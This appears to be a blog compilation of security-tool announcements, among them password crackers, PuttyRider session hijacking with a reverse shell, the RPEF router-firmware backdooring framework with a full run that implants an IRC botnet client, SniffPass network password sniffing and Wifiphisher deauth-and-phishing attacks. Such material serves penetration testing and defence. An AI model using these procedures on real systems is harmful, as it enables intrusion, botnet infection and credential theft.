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Snort 3.0 - Network intrusion prevention and detection system (IDS/IPS)


Snort is the most powerful IPS in the world, setting the standard for intrusion detection. So when we started thinking about what the next generation of IPS looked like we started from scratch.

  • Support multiple packet processing threads
  • Shared configuration and attribute table
  • Use a simple, scriptable configuration
  • Make key components pluggable
  • Autodetect services for portless configuration
  • Support sticky buffers in rules
  • Autogenerate reference documentation
  • Provide better cross platform support

Windows Password Kracker - Free Windows Password Recovery Software


Windows Password Kracker is a free software to recover the lost or forgotten Windows password. It can quickly recover the original windows password from either LM (LAN Manager) or NTLM (NT LAN Manager) Hash.

Windows encrypts the login password using LM or NTLM hash algorithm. Since these are one way hash algorithms we cannot directly decrypt the hash to get back the original password. In such cases 'Windows Password Kracker' can help in recovering the windows password using the simple dictionary crack method.

Before that you need to dump the password hashes from live or remote windows system using pwdump tool (more details below). Then feed the hash (LM/NTLM) for the corresponding user into 'Windows Password Kracker' to recover the password for that user.

In forensic scenarios, investigator can dump the hashes from the live/offline system and then crack it using 'Windows Password Kracker' to recover the original password. This is very crucial as such a password can then be used to decrypt stored credentials as well as encrypted volumes on that system.

'Windows Password Kracker' uses simple & quicker Dictionary based password recovery technique. By default it comes with sample password file. However you can find good collection of password dictionaries (also called wordlist) here& here.

Though it supports only Dictionary Crack method, you can easily use tools like Crunch, Cupp to generate brute-force based or any custom password list file and then use it with 'Windows Password Kracker'.

It works on both 32 bit & 64 bit windows systems starting from Windows XP to Windows 8.

PuttyRider - Hijack Putty sessions in order to sniff conversation and inject Linux commands


PuttyRider injects a DLL into a running putty.exe process in order to sniff all communication and inject Linux commands on the remote server.

This can be useful in an internal penetration test when you already have access to a sysadmin’s machine who has a Putty session open to a Linux server. You can use PuttyRider to take control of the remote server using the existing SSH session.

The tool has been recently presented at Defcamp 2014 – a security conference in Romania.

List existing Putty processes and their status (injected / not injected)
PuttyRider.exe -l
Inject DLL into the first found putty.exe and initiate a reverse connection from DLL to my IP:Port, then exit PuttyRider.exe.
PuttyRider.exe -p 0 -r
Run in background and wait for new Putty processes. Inject in any new putty.exe and write all conversations in local files.
PuttyRider.exe -w -f
Eject PuttyRider.dll from all Putty processes where it is already injected. (Don't forget to kill PuttyRider.exe if running in -w mode, otherwise it will reinject again.)
PuttyRider.exe -x

Operation modes:
-l List the running Putty processes and their connections
-w Inject in all existing Putty sessions and wait for new sessions
to inject in those also
-p PID Inject only in existing Putty session identified by PID.
If PID==0, inject in the first Putty found
-x Cleanup. Remove the DLL from all running Putty instances
-d Debug mode. Only works with -p mode
-c CMD Automatically execute a Linux command after successful injection
PuttyRider will remove trailing spaces and '&' character from CMD
PuttyRider will add: " 1>/dev/null 2>/dev/null &" to CMD
-h Print this help

Output modes:
-f Write all Putty conversation to a file in the local directory.
The filename will have the PID of current putty.exe appended
-r IP:PORT Initiate a reverse connection to the specified machine and
start an interactive session.

Interactive commands (after you receive a reverse connection):
!status See if the Putty window is connected to user input
!discon Disconnect the main Putty window so it won't display anything
This is useful to send commands without the user to notice
!recon Reconnect the Putty window to its normal operation mode
CMD Linux shell commands
!exit Terminate this connection
!help Display help for client connection

John the Ripper 1.8.0-jumbo-1 - Fast Password Cracker


John the Ripper is a free password cracking software tool. Initially developed for the Unix operating system, it now runs on fifteen different platforms (eleven of which are architecture-specific versions of Unix, DOS, Win32, BeOS, and OpenVMS). It is one of the most popular password testing and breaking programs as it combines a number of password crackers into one package, autodetects password hash types, and includes a customizable cracker. It can be run against various encrypted password formats including several crypt password hash types most commonly found on various Unix versions (based on DES, MD5, or Blowfish), Kerberos AFS, and Windows NT/2000/XP/2003 LM hash. Additional modules have extended its ability to include MD4-based password hashes and passwords stored in LDAP, MySQL, and others.

John the Ripper 1.8.0-jumbo-1 is based on today’s code from the bleeding-jumbo branch on GitHub, which we’ve tried to make somewhat stable lately in preparation for this release.

You may notice that the source code archive size has increased from under 2 MB to over 20 MB. This is primarily due to the included .chr files, which are both bigger and more numerous than pre-1.8 ones. There are lots of source code additions, too.

In fact:

This is probably the biggest single jumbo update so far. The changes are too numerous to summarize – unfortunately, we haven’t been doing that during development, and it’d be a substantial effort to do it now, delaying the release to next year. So we chose to go ahead and release whatever we’ve got. (Of course, there are the many commit messages -but that’s not a summary.)

A really brief summary, though, is that there are new “formats” (meaning more supported hash and “non-hash” types, both on CPU and on GPU), various enhancements to existing ones, mask mode, better support for non-ASCII character sets, and of course all of 1.8.0’s features (including –fork and –node). And new bugs. Oh, and we’re now using autoconf, meaning that you need to “./configure” and “make”, with all the usual pros and cons of this approach. There’s a Makefile.legacy included, so you may “make -f Makefile.legacy” to try and build JtR the old way if you refuse to use autoconf… for now…and this _might_ even work… but you’d better bite the bullet. (BTW, I have no current plans on autoconf’ing non-jumbo versions of JtR.)

Due to autoconf, things such as OpenMP and OpenCL are now enabled automatically (if system support for them is detected during build). When this is undesirable, you may use e.g. “./configure –disable-openmp” or “./configure –disable-openmp-for-fast-formats” and run with –fork to achieve a higher cumulative c/s rate across the fork’ed processes.

Out of over 4800 commits since 1.7.9-jumbo-7, over 2600 are by magnum, making him the top contributor. Other prolific contributors are JimF, Dhiru Kholia, Claudio Andre, Frank Dittrich, Sayantan Datta.

There are also multiple commits by (or attributed to) Lukas Odzioba, ShaneQful, Alexander Cherepanov, rofl0r, bwall, Narendra Kangralkar, Tavis Ormandy, Spiros Fraganastasis, Harrison Neal, Vlatko Kosturjak, Aleksey Cherepanov, Jeremi Gosney, junmuz, Thiebaud Weksteen, Sanju Kholia, Michael Samuel, Deepika Dutta, Costin Enache, Nicolas Collignon, Michael Ledford. There are single commits by (or attributed to) many other contributors as well (including even one by atom of hashcat).

CeWL - Custom WordList Generator Tool for Password Cracking

CeWL is a ruby app which spiders a given url to a specified depth, optionally following external links, and returns a list of words which can then be used for password crackers such as John the Ripper.

CeWL also has an associated command line app, FAB (Files Already Bagged) which uses the same meta data extraction techniques to create author/creator lists from already downloaded.

cewl [OPTION] ... URL
--help, -h
Show help
--depth x, -d x
The depth to spider to, default 2
--min_word_length, -m
The minimum word length, this strips out all words under the specified length, default 3
--offsite, -o
By default, the spider will only visit the site specified. With this option it will also visit external sites
--write, -w file
Write the ouput to the file rather than to stdout
--ua, -u user-agent
Change the user agent
Verbose, show debug and extra output
--no-words, -n
Don't output the wordlist
--meta, -a file
Include meta data, optional output file
--email, -e file
Include email addresses, optional output file
--meta_file file
Filename for metadata output
--email_file file
Filename for email output
--meta-temp-dir directory
The directory used used by exiftool when parsing files, the default is /tmp
--count, -c:
Show the count for each of the words found
Digest or basic
Authentication username
Authentication password
Proxy host
Proxy port, default 8080
Username for proxy, if required
Password for proxy, if required
--verbose, -v
The site to spider.

Change Log
Keeping track of history.
  • Version 4.3 - Various spider bug fixes and the introduction of the sorting the results by count
  • Version 4.2 - Fixed the Spider gem by overriding the function, also handling #name links correctly
  • Version 4.1 - Small bug fixes and added new parameter to set filenames for email and metadata output
  • Version 4 - Runs with Ruby 1.9.x and grabs text out of alt and title tags
  • Version 3 - Now spiders pages referenced in JavaScript location commands
  • Version 2.2 - Data from email addresses and meta data can be written to their own files
  • Version 2.1 - Fixed a bug some people were having while using the email option
  • Version 2 - Added meta data support
  • Version 1 - released

USBPcap - USB Packet capture for Windows (open-source USB Sniffer for Windows)

RPEF - Abstracts and expedites the process of backdooring stock firmware images for consumer/SOHO routers


Router Post-Exploitation Framework

Currently, the framework includes a number of firmware image modules:
'Verified'   - This module is confirmed to work and is stable.

'Unverified' - This module is believed to work or should work with
little additional effort, but awaits being tested on a
physical device.

'Testing' - This module is currently undergoing development and is
unstable for the time being. Users should consider this
module a "work in progress."

'Roadblock' - Issues have halted progress on this module for the time
being. Certain unavailable utilities or significant
reverse engineering work may be necessary.
For a list of options, run:
./rpef.py -h
For a list of all currently supported firmware targets, run:
./rpef.py -ll

The script is written for Python 2.6 and may require the installation of a few modules. It is typically invoked as:
./rpef.py <firmware image> <output file> <payload>
and accepts a number of optional switches (see -h).
The rules/ directory stores a hierarchy of rules// directories. One module correlates to one firmware checksum (not to one specific router) since multiple routers have been observed to run the exact same firmware. Within each module is properties.json which stores the language and order of operations necessary to unpackage, backdoor, and repackage the target firmware image. The payloads/ directory stores cross-compiled binaries ready for deployment, and the optional dependencies/ directory stores miscellaneous files to aid the process.
The utilities/ directory stores pre-compiled x86 binaries to perform tasks such as packing/unpacking filesystems, compressing/decompressing data (for which no suitable .py module exists), and calculating checksums.
The payloads_src/ directory stores source code for the payloads themselves. All payloads are written from scratch to keep them as small as possible.


To verbosely generate a firmware image for the WGR614v9 backdoored with a botnet client, run:
./rpef.py WGR614v9-V1.2.30_41.0.44NA.chk WGR614v9-V1.2.30_41.0.44NA_botnet.chk botnet -v
And the process should proceed as follows:
$ ./rpef.py WGR614v9-V1.2.30_41.0.44NA.chk WGR614v9-V1.2.30_41.0.44NA_botnet.chk botnet -v
[+] Verifying checksum
Calculated checksum: 767c962037b32a5e800c3ff94a45e85e
Matched target: NETGEAR WGR614v9 1.2.30NA (Verified)
[+] Extracting parts from firmware image
Step 1: Extract WGR614v9-V1.2.30_41.0.44NA.chk, Offset 58, Size 456708 -> /tmp/tmpOaw1tn/headerkernel.bin
Step 2: Extract WGR614v9-V1.2.30_41.0.44NA.chk, Offset 456766, Size 1476831 -> /tmp/tmpOaw1tn/filesystem.bin
[+] Unpacking filesystem
Step 1: unsquashfs-1.0 /tmp/tmpOaw1tn/filesystem.bin -> /tmp/tmpOaw1tn/extracted_fs
Executing: utilities/unsquashfs-1.0 -dest /tmp/tmpOaw1tn/extracted_fs /tmp/tmpOaw1tn/filesystem.bin

created 217 files
created 27 directories
created 48 symlinks
created 0 devices
created 0 fifos
[+] Inserting payload
Step 1: Rm /tmp/tmpOaw1tn/extracted_fs/lib/modules/2.4.20/kernel/net/ipv4/opendns/openDNS_hijack.o
Step 2: Copy rules/NETGEAR/WGR614v9_1.2.30NA/payloads/botnet /tmp/tmpOaw1tn/extracted_fs/usr/sbin/botnet
Step 3: Move /tmp/tmpOaw1tn/extracted_fs/usr/sbin/httpd /tmp/tmpOaw1tn/extracted_fs/usr/sbin/httpd.bak
Step 4: Touch /tmp/tmpOaw1tn/extracted_fs/usr/sbin/httpd
Step 5: Appendtext "#!/bin/msh
" >> /tmp/tmpOaw1tn/extracted_fs/usr/sbin/httpd
[+] INPUT REQUIRED, IP address of IRC server:
[+] INPUT REQUIRED, Port of IRC server: 6667
[+] INPUT REQUIRED, Channel to join (include #): #hax
[+] INPUT REQUIRED, Prefix of bot nick: toteawesome
Step 6: Appendtext "/usr/sbin/botnet 6667 \#hax toteawesome &
" >> /tmp/tmpOaw1tn/extracted_fs/usr/sbin/httpd
Step 7: Appendtext "/usr/sbin/httpd.bak
" >> /tmp/tmpOaw1tn/extracted_fs/usr/sbin/httpd
Step 8: Chmod 777 /tmp/tmpOaw1tn/extracted_fs/usr/sbin/httpd
[+] Building filesystem
Step 1: mksquashfs-2.1 /tmp/tmpOaw1tn/extracted_fs, Blocksize 65536, Little endian -> /tmp/tmpOaw1tn/newfs.bin
Executing: utilities/mksquashfs-2.1 /tmp/tmpOaw1tn/extracted_fs /tmp/tmpOaw1tn/newfs.bin -b 65536 -root-owned -le
Creating little endian 2.1 filesystem on /tmp/tmpOaw1tn/newfs.bin, block size 65536.

Little endian filesystem, data block size 65536, compressed data, compressed metadata, compressed fragments
Filesystem size 1442.99 Kbytes (1.41 Mbytes)
29.38% of uncompressed filesystem size (4912.18 Kbytes)
Inode table size 2245 bytes (2.19 Kbytes)
33.63% of uncompressed inode table size (6675 bytes)
Directory table size 2322 bytes (2.27 Kbytes)
55.26% of uncompressed directory table size (4202 bytes)
Number of duplicate files found 3
Number of inodes 293
Number of files 218
Number of fragments 22
Number of symbolic links 48
Number of device nodes 0
Number of fifo nodes 0
Number of socket nodes 0
Number of directories 27
Number of uids 1
root (0)
Number of gids 0
[+] Gluing parts together
Step 1: Touch WGR614v9-V1.2.30_41.0.44NA_botnet.chk
Step 2: Appendfile /tmp/tmpOaw1tn/headerkernel.bin >> WGR614v9-V1.2.30_41.0.44NA_botnet.chk
Step 3: Appendfile /tmp/tmpOaw1tn/newfs.bin >> WGR614v9-V1.2.30_41.0.44NA_botnet.chk
[+] Padding image with null bytes
Step 1: Pad WGR614v9-V1.2.30_41.0.44NA_botnet.chk to size 1937408 with 0 (0x00)
[+] Generating CHK header
Step 1: packet WGR614v9-V1.2.30_41.0.44NA_botnet.chk rules/NETGEAR/WGR614v9_1.2.30NA/dependencies/compatible_NA.txt rules/NETGEAR/WGR614v9_1.2.30NA/dependencies/ambitCfg.h
Executing: utilities/packet -k WGR614v9-V1.2.30_41.0.44NA_botnet.chk -b rules/NETGEAR/WGR614v9_1.2.30NA/dependencies/compatible_NA.txt -i rules/NETGEAR/WGR614v9_1.2.30NA/dependencies/ambitCfg.h
[+] Removing temporary files
Step 1: Rmdir /tmp/tmpOaw1tn/

BlueMaho - Bluetooth Security Testing Suite


BlueMaho is GUI-shell (interface) for suite of tools for testing security of bluetooth devices. It is freeware, opensource, written on python, uses wxPyhon. It can be used for testing BT-devices for known vulnerabilities and major thing to do - testing to find unknown vulns. Also it can form nice statistics.

What it can do? (features)
  • scan for devices, show advanced info, SDP records, vendor etc
  • track devices - show where and how much times device was seen, its name changes
  • loop scan - it can scan all time, showing you online devices
  • alerts with sound if new device found
  • on_new_device - you can spacify what command should it run when it founds new device
  • it can use separate dongles - one for scaning (loop scan) and one for running tools or exploits
  • send files
  • change name, class, mode, BD_ADDR of local HCI devices
  • save results in database
  • form nice statistics (uniq devices by day/hour, vendors, services etc)
  • test remote device for known vulnerabilities (see exploits for more details)
  • test remote device for unknown vulnerabilities (see tools for more details)
  • themes! you can customize it

What tools and exploits it consist of?
  • Tools:
  • atshell.c by Bastian Ballmann (modified attest.c by Marcel Holtmann)
  • bccmd by Marcel Holtmann
  • bdaddr.c by Marcel Holtmann
  • bluetracker.py by smiley
  • carwhisperer v0.2 by Martin Herfurt
  • psm_scan and rfcomm_scan from bt_audit-0.1.1 by Collin R. Mulliner
  • BSS (Bluetooth Stack Smasher) v0.8 by Pierre Betouin
  • btftp v0.1 by Marcel Holtmann
  • btobex v0.1 by Marcel Holtmann
  • greenplaque v1.5 by digitalmunition.com
  • L2CAP packetgenerator by Bastian Ballmann
  • obex stress tests 0.1
  • redfang v2.50 by Ollie Whitehouse
  • ussp-push v0.10 by Davide Libenzi
  • exploits/attacks:
  • Bluebugger v0.1 by Martin J. Muench
  • bluePIMp by Kevin Finisterre
  • BlueZ hcidump v1.29 DoS PoC by Pierre Betouin
  • helomoto by Adam Laurie
  • hidattack v0.1 by Collin R. Mulliner
  • Mode 3 abuse attack
  • Nokia N70 l2cap packet DoS PoC Pierre Betouin
  • opush abuse (prompts flood) DoS attack
  • Sony-Ericsson reset display PoC by Pierre Betouin
  • you can add your own tools by editing 'exploits/exploits.lst' and 'tools/tools.lst'

  • OS (tested with Debian 4.0 Etch / 2.6.18)
  • python (python 2.4 http://www.python.org)
  • wxPython (python-wxgtk2.6 http://www.wxpython.org)
  • BlueZ (3.9/3.24) http://www.bluez.org
  • Eterm to open tools somewhere, you can set another term in 'config/defaul.conf' changing the value of 'cmd_term' variable. (tested with 1.1 ver)
  • pkg-config(0.21), 'tee' used in tools/showmaxlocaldevinfo.sh, openobex, obexftp
  • libopenobex1 + libopenobex-dev (needed by ussp-push)
  • libxml2, libxml2-dev (needed by btftp)
  • libusb-dev (needed by bccmd)
  • libreadline5-dev (needed by atshell.c)
  • lightblue-0.3.3 (needed by obexstress.py)
  • hardware: any bluez compatible bluetooth-device 

Tcpcrypt - Encrypting the Internet


Tcpcrypt is a protocol that attempts to encrypt (almost) all of your network traffic. Unlike other security mechanisms, Tcpcrypt works out of the box: it requires no configuration, no changes to applications, and your network connections will continue to work even if the remote end does not support Tcpcrypt, in which case connections will gracefully fall back to standard clear-text TCP. Install Tcpcrypt and you'll feel no difference in your every day user experience, but yet your traffic will be more secure and you'll have made life much harder for hackers.

So why is now the right time to turn on encryption? Here are some reasons:
  • Intercepting communications today is simpler than ever because of wireless networks. Ask a hacker how many e-mail passwords can be intercepted at an airport by just using a wifi-enabled laptop. This unsophisticated attack is in reach of many. The times when only a few elite had the necessary skill to eavesdrop are gone.
  • Computers have now become fast enough to encrypt all Internet traffic. New computers come with special hardware crypto instructions that allow encrypted networking speeds of 10Gbit/s. How many of us even achieve those speeds on the Internet or would want to download (and watch) one movie per second? Clearly, we can encrypt fast enough.
  • Research advances and the lessons learnt from over 10 years of experience with the web finally enabled us to design a protocol that can be used in today's Internet, by today's users. Our protocol is pragmatic: it requires no changes to applications, it works with NATs (i.e., compatible with your DSL router), and will work even if the other end has not yet upgraded to tcpcrypt—in which case it will gracefully fall back to using the old plain-text TCP. No user configuration is required, making it accessible to lay users—no more obscure requests like "Please generate a 2048-bit RSA-3 key and a certificate request for signing by a CA". Tcpcrypt can be incrementally deployed today, and with time the whole Internet will become encrypted.

How Tcpcrypt works

Tcpcrypt is opportunistic encryption. If the other end speaks Tcpcrypt, then your traffic will be encrypted; otherwise it will be in clear text. Thus, Tcpcrypt alone provides no guarantees—it is best effort. If, however, a Tcpcrypt connection is successful and any attackers that exist are passive, then Tcpcrypt guarantees privacy.

Network attackers come in two varieties: passive and active (man-in-the-middle). Passive attacks are much simpler to execute because they just require listening on the network. Active attacks are much harder as they require listening and modifying network traffic, often requiring very precise timing that can make some attacks impractical.

By default Tcpcrypt is vulnerable to active attacks—an attacker can, for example, modify a server's response to say that Tcpcrypt is not supported (when in fact it is) so that all subsequent traffic will be clear text and can thus be eavesdropped on.

Tcpcrypt, however, is powerful enough to stop active attacks, too, if the application using it performs authentication. For example, if you log in to online banking using a password and the connection is over Tcpcrypt, it is possible to use that shared secret between you and the bank (i.e., the password) to authenticate that you are actually speaking to the bank and not some active (man-in-the-middle) attacker. The attacker cannot spoof authentication as it lacks the password. Thus, by default, Tcpcrypt will try its best to protect your traffic. Applications requiring stricter guarantees can get them by authenticating a Tcpcrypt session.

How Tcpcrypt is different

Some of us already encrypt some network traffic using SSL (e.g., HTTPS) or VPNs. Those solutions are inadequate for ubiquitous encryption. For example, almost all solutions rely on a PKI to stop man-in-the-middle attacks, which for ubiquitous deployment would mean that all Internet users would have to get verified by a CA like Verisign and have to spend money to buy a certificate. Tcpcrypt abstracts away authentication, allowing any mechanism to be used, whether PKI, passwords, or something else.
Next, Tcpcrypt can be incrementally deployed: it has a mechanism for probing support and can gracefully fall back to TCP. It also requires no configuration (try that with a VPN!) and has no NAT issues. Finally, Tcpcrypt has very high performance (up to 25x faster than SSL), making it feasible for high volume servers to enable encryption on all connections. While weaker by default, Tcpcrypt is more realistic for universal deployment.

We can easily make the bar much higher for attackers, so let's do it. How much longer are we going to stay clear-text by default?

LUKS-OPs - Automate the usage of LUKS volumes in Linux


A bash script to automate the most basic usage of LUKS volumes in Linux. Like:
  • Creating a virtual disk volume with LUKS format.
  • Mounting an existing LUKS volume
  • Unmounting a Single LUKS volume or all LUKS volume in the system.
Basic Usage

There is an option for a menu:
./luks-ops.sh menu or simply ./luks-ops.sh

Other options include:
./luks-ops.sh new disk_Name Size_in_numbers
./luks-ops.sh mount /path/to/device (mountpoint)
./luks-ops.sh unmount-all
./luks-ops.sh clean
./luks-ops.sh usage

Default Options:
  • Virtual-disk size = 512 MB and it's created on /usr/ directory
  • Default filesystem used = ext4
  • Cipher options:
    • Creating LUKS1: aes-xts-plain64, Key: 256 bits, LUKS header hashing: sha1, RNG: /dev/urandom
    • plain: aes-cbc-essiv:sha256, Key: 256 bits, Password hashing: ripemd160 (about-time :D)
  • Mounting point = /media/luks_* where * is random-string.
  • Others.. NB. You can change /dev/urandom to /dev/zero (speed?)
Dependencies (Install applications:)
  1. dmsetup --- low level logical volume management
  2. cryptsetup --- manage plain dm-crypt and LUKS encrypted volumes

SPARTA - Network Infrastructure Penetration Testing Tool


SPARTA is a python GUI application which simplifies network infrastructure penetration testing by aiding the penetration tester in the scanning and enumeration phase. It allows the tester to save time by having point-and-click access to his toolkit and by displaying all tool output in a convenient way. If little time is spent setting up commands and tools, more time can be spent focusing on analysing results.


– Run nmap from SPARTA or import nmap XML output.
– Transparent staged nmap: get results quickly and achieve thorough coverage.
– Configurable context menu for each service. You can configure what to run on discovered services. Any tool that can be run from a terminal, can be run from SPARTA.
– You can run any script or tool on a service across all the hosts in scope, just with a click of the mouse.
– Define automated tasks for services (ie. Run nikto on every HTTP service, or sslscan on every ssl service).
– Default credentials check for most common services. Of course, this can also be configured to run automatically.
– Identify password reuse on the tested infrastructure. If any usernames/passwords are found by Hydra they are stored in internal wordlists which can then be used on other targets in the same network (breaking news: sysadmins reuse passwords).
– Ability to mark hosts that you have already worked on so that you don’t waste time looking at them again.
– Website screenshot taker so that you don’t waste time on less interesting web servers.

Faraday v1.0.7 - Integrated Penetration-Test Environment a multiuser Penetration test IDE


Faraday introduces a new concept (IPE) Integrated Penetration-Test Environment a multiuser Penetration test IDE. Designed for distribution, indexation and analysis of the generated data during the process of a security audit.

The main purpose of Faraday is to re-use the available tools in the community to take advantage of them in a multiuser way.

Designed for simplicity, users should notice no difference between their own terminal application and the one included in Faraday. Developed with a specialized set of functionalities that help users improve their own work. Do you remember yourself programming without an IDE? Well, Faraday does the same as an IDE does for you when programming, but from the perspective of a penetration test.

Changes made to the UX/UI:
  • Improved Vulnerability Edition usability, selecting a vulnerability will load it's content automatically.
  • ZSH UI now is showing notifications.
  • ZSH UI displays active workspaces.
  • Faraday now asks confirmation when exiting out. If you have pending conflicts to resolve it will show the number for each one.
  • Vulnerability creation is now supported in the status report.
  • Introducing SSLCheck, a tool for verifying bugs in SSL/TLS Certificates on remote hosts. This is integrated with Faraday as a plugin.
  • Shodan Plugin is now working with the new API.
  • Some cosmetic changes for the status report.
  • Sorting columns in the Status Report is running smoothly.
  • The Workspace icon is now based on the type of workspace being used.
  • Opening the reports in QT UI opens the active workspace.
  • UI Web dates fixes, we were showing dates with a off-by-one error.
  • Vulnerability edition was missing 'critical' severity.
  • Objects merge bugfixing
  • Metadata recursive save fix

Nipper - Toolkit Web Scan for Android


La Primera herramienta de escáner de vulnerabilidades WEB, En entorno Android (Versión para iOS en desarrollo), este escáner de vulnerabilidad fue enfocado para CMS más usadas, (WordPress, Drupal, Joomla. Blogger ).

En su primera versión Nipper cuenta con 10 módulos distintos, para recopilar información acerca de un URL en específica.

Su interfaz ha sido pensada para que tan solo con unos “toques” en su interfaz extraerías gran parte de su información.

Módulos Disponibles:
  • IP Server
  • CMS Detect & Version
  • DNS Lookup
  • Nmap ports IP SERVER
  • Enumeration Users
  • Enumeration Plugins
  • Find Exploit Core CMS
  • Find Exploit DB
  • CloudFlare Resolver
Nipper NO requiere ROOT, tan solo requiere permiso a internet.
Compatible desde 2.3 a Android L.

Acunetix Online Vulnerability Scanner


Acunetix Online Vulnerability Scanner acts as a virtual security officer for your company, scanning your websites, including integrated web applications, web servers and any additional perimeter servers for vulnerabilities. And allowing you to fix them before hackers exploit the weak points in your IT infrastructure!

Leverages Acunetix leading web application scanner

Building on Acunetix’ advanced web scanning technology, Acunetix OVS scans your website for vulnerabilities – without requiring to you to license, install and operate Acunetix Web Vulnerability scanner. Acunetix OVS will deep scan your website – with its legendary crawling capability – including full HTML 5 support, and its unmatched SQL injection and Cross Site Scripting finding capabilities.

Unlike other online security scanners, Acunetix is able to find a much greater number of vulnerabilities because of its intelligent analysis engine – it can even detect DOM Cross-Site Scripting and Blind SQL Injection vulnerabilities. And with a minimum of false positives. Remember that in the world of web scanning its not the number of different vulnerabilities that it can find, its the depth with which it can check for vulnerabilities. Each scanner can find one or more SQL injection vulnerabilities, but few can find ALMOST ALL. Few scanners are able to find all pages and analyze all content, leaving large parts of your website unchecked. Acunetix will crawl the largest number of pages and analyze all content.

Utilizes OpenVAS for cutting edge network security scanning

And Acunetix OVS does not stop at web vulnerabilities. Recognizing the need to scan at network level and wanting to offer best of breed technology only, Acunetix has partnered with OpenVAS – the leading network security scanner. OpenVAS has been in development for more then 10 years and is backed by renowned security developers Greenbone. OpenVAS draws on a vulnerability database of thousands of network level vulnerabilities. Importantly, OpenVAS vulnerability databases are always up to date, boasting an average response rate of less than 24 hours for updating and deploying vulnerability signatures to scanners.

Start your scan today

Getting Acunetix on your side is easy – sign up in minutes, install the site verification code and your scan will commence. Scanning can take several hours, depending on the amount of pages and the complexity of the content. After completion, scan reports are emailed to you – and Acunetix Security Consultants are on standby to explain the results and help you action remediation. For a limited time period, 2 full Network Scans are included for FREE in the 14-day trial. 

Kali Linux NetHunter - Android penetration testing platform


NetHunter is a Android penetration testing platform for Nexus and OnePlus devices built on top of Kali Linux, which includes some special and unique features. Of course, you have all the usual Kali tools in NetHunter as well as the ability to get a full VNC session from your phone to a graphical Kali chroot, however the strength of NetHunter does not end there.

We’ve incorporated some amazing features into the NetHunter OS which are both powerful and unique. From pre-programmed HID Keyboard (Teensy) attacks, to BadUSB Man In The Middle attacks, to one-click MANA Evil Access Point setups. And yes, NetHunter natively supports wireless 802.11 frame injection with a variety of supported USB NICs. NetHunter is still in its infancy and we are looking forward to seeing this project and community grow.

Supported Devices
The Kali NetHunter image is currently compatible with the following Nexus and OnePlus devices:
  • Nexus 4 (GSM) - “mako”
  • Nexus 5 (GSM/LTE) - “hammerhead”
  • Nexus 7 [2012] (Wi-Fi) - “nakasi”
  • Nexus 7 [2012] (Mobile) - “nakasig”
  • Nexus 7 [2013] (Wi-Fi) - “razor”
  • Nexus 7 [2013] (Mobile) - “razorg”
  • Nexus 10 (Tablet) - “mantaray”
  • OnePlus One 16 GB - “bacon”
  • OnePlus One 64 GB - “bacon”

Important Concepts
  • Kali NetHunter runs within a chroot environment on the Android device so, for example, if you start an SSH server via an Android application, your SSH connection would connect to Android and not Kali Linux. This applies to all network services.
  • When configuring payloads, the IP address field is the IP address of the system where you want the shell to return to. Depending on your scenario, you may want this address to be something other than the NetHunter.
  • Due to the fact that the Android device is rooted, Kali NetHunter has access to all hardware, allowing you to connect USB devices such as wireless NICs directly to Kali using an OTG cable.

SniffPass - Password Monitoring/Sniffing Software (Web/FTP/Email)


SniffPass is small password monitoring software that listens to your network, capture the passwords that pass through your network adapter, and display them on the screen instantly. SniffPass can capture the passwords of the following Protocols: POP3, IMAP4, SMTP, FTP, and HTTP (basic authentication passwords). 

You can use this utility to recover lost Web/FTP/Email passwords.

Using SniffPass

In order to start using SniffPass, follow the instructions below:
  1. Download and install the WinPcap capture driver or the Microsoft Network Monitor driver. 
    You can also try to capture without any driver installation, simply by using the 'Raw Socket' capture method, but you should be aware that this method doesn't work properly in many systems.
  2. Run the executable file of SniffPass (SniffPass.exe).
  3. From the File menu, select "Start Capture", or simply click the green play button in the toolbar. If it's the first time that you use SniffPass, you'll be asked to select the capture method and the network adapter that you want to use. 
    After you select the desired capture options, SniffPass listen to your network adapter, and display instantly any password that it find.
  4. In order to verify that the password sniffing works in your system, go to the demo Web page at http://www.nirsoft.net/password_test and type 'demo' as user name and 'password' as the password. After typing the user name/password and clicking 'Ok', you should see a new line in the main window of SniffPass containing the user/password you typed.

Get passwords of another computer on your network ?

Many people ask me whether SniffPass is able to get passwords from another computer on the same network. So here's the answer. In order to grab the passwords from other network computers:
  1. You must use a simple hub to connect your computers to the network. All modern switches and routers automatically filter the packets of the other computers, so the computer that runs SniffPass will never "see" the passwords of other computers when you use a switch or a router.
  2. Your network card must be able to enter into 'Promiscuous Mode'.
  3. You must use WinPCap or Network Monitor Driver as a capture method.
  4. For wireless network: Most wireless network cards (or their device drivers) automatically filter the packets of other computers, so you won't be able the capture the passwords of ther computers. However, starting from Windows Vista/7, you can capture passwords of wireless networks that are not encrypted, by using Wifi Monitor Mode and Network Monitor Driver 3.x.  
    For more information about capturing from wireless networks , read this Blog post: How to capture data and passwords of unsecured wireless networks with SniffPass and SmartSniff

Command-Line Options

Command Description
/NoCapDriver Starts SniffPass without loading the WinPcap Capture Driver.
/NoReg Starts SniffPass without loading/saving your settings to the Registry.     

WiFiPhisher - Fast automated phishing attacks against WiFi networks


Wifiphisher is a security tool that mounts fast automated phishing attacks against WiFi networks in order to obtain secret passphrases and other credentials. It is a social engineering attack that unlike other methods it does not include any brute forcing. It is an easy way for obtaining credentials from captive portals and third party login pages or WPA/WPA2 secret passphrases.

Wifiphisher works on Kali Linux and is licensed under the MIT license.

From the victim's perspective, the attack makes use in three phases:
  1. Victim is being deauthenticated from her access point. Wifiphisher continuously jams all of the target access point's wifi devices within range by sending deauth packets to the client from the access point, to the access point from the client, and to the broadcast address as well.
  2. Victim joins a rogue access point. Wifiphisher sniffs the area and copies the target access point's settings. It then creates a rogue wireless access point that is modeled on the target. It also sets up a NAT/DHCP server and forwards the right ports. Consequently, because of the jamming, clients will start connecting to the rogue access point. After this phase, the victim is MiTMed.
  3. Victim is being served a realistic router config-looking page. wifiphisher employs a minimal web server that responds to HTTP & HTTPS requests. As soon as the victim requests a page from the Internet, wifiphisher will respond with a realistic fake page that asks for credentials, for example one that asks WPA password confirmation due to a router firmware upgrade.

Short formLong formExplanation
-mmaximumChoose the maximum number of clients to deauth. List of clients will be emptied and repopulated after hitting the limit. Example: -m 5
-nnoupdateDo not clear the deauth list when the maximum (-m) number of client/AP combos is reached. Must be used in conjunction with -m. Example: -m 10 -n
-ttimeintervalChoose the time interval between packets being sent. Default is as fast as possible. If you see scapy errors like 'no buffer space' try: -t .00001
-ppacketsChoose the number of packets to send in each deauth burst. Default value is 1; 1 packet to the client and 1 packet to the AP. Send 2 deauth packets to the client and 2 deauth packets to the AP: -p 2
-ddirectedonlySkip the deauthentication packets to the broadcast address of the access points and only send them to client/AP pairs
-aaccesspointEnter the MAC address of a specific access point to target
